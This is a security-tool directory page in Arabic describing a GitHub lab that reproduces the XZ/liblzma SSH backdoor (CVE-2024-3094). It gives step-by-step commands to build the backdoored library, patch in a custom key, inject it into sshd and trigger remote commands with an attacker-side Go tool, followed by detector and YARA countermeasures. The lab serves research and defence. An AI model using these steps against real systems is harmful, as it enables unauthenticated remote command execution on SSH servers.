Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-3094 — ثغرة باب خلفي في XZ موضحة بالتفاصيل | Kitploit
أدوات/GitHubGitHub/valeriot30/cve-2024-3094
تحليل الثغرات الأمنيةالاستغلالتحليل البرمجيات الخبيثةتحليل الملفات الثنائيةالتعلم والتعليممختبرات وتدريب عملي
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

ثغرة باب خلفي في XZ موضحة بالتفاصيل

عرض المستودع
119منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ مشروع الأمن السيبراني: تحليل الباب الخلفي XZ في liblzma

📄 نظرة عامة

يحلل هذا المشروع الباب الخلفي البارز المكتشف في xz-utils (liblzma)، والذي يؤثر على الإصدارين 5.6.0 و 5.6.1. استهدف الكود الخبيث الذي تم إدخاله في نظام بناء المنبع مصادقة SSH عن طريق تعديل كيفية تفاعل sshd مع مكتبة ضغط LZMA في وقت التشغيل.

⚠️ هذا المشروع لأغراض البحث التعليمي والدفاعي فقط.

الجهاز الضعيف

استنساخ هذا المستودع

git clone https://github.com/valeriot30/cve-2024-3094

انتقل إلى الدليل

cd cve-2024-3094

تشغيل حاوية docker

docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

الحصول على نسخة ضارة من المكتبة

cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

تصدير هدف البناء

export RPM_ARCH=$(uname -m)

تجميع المكتبة الضارة

cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

نسخ SO الضار إلى الخارج:

cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

استنساخ المستودع مرة أخرى داخل الحاوية

git clone https://github.com/valeriot30/cve-2024-3094

تطبيق التصحيح على مكتبة liblzma بمفتاح مخصص

 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

ربط المكتبة الضارة في النظام

 sh cve-2024-3094/inject.sh

تشغيل sshd المرتبط بالمكتبة الضارة

 env -i LANG=C /usr/sbin/sshd -D &

جهاز المهاجم

استنساخ هذا المستودع

git clone https://github.com/valeriot30/cve-2024-3094

انتقل إلى الدليل

cd cve-2024-3094

تجميع أداة GO

go build

استخدم الأداة بإدخال عنوان IP للجهاز الضعيف والأمر المراد تنفيذه

./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

الإجراءات المضادة

استخدام الكاشف

تشغيل الكاشف

sh detector.sh

استخدام Yara

استخدام قواعد مطابقة yara

yara rule.yar ../liblzma.so.5.6.0 -s
تنزيل الأداة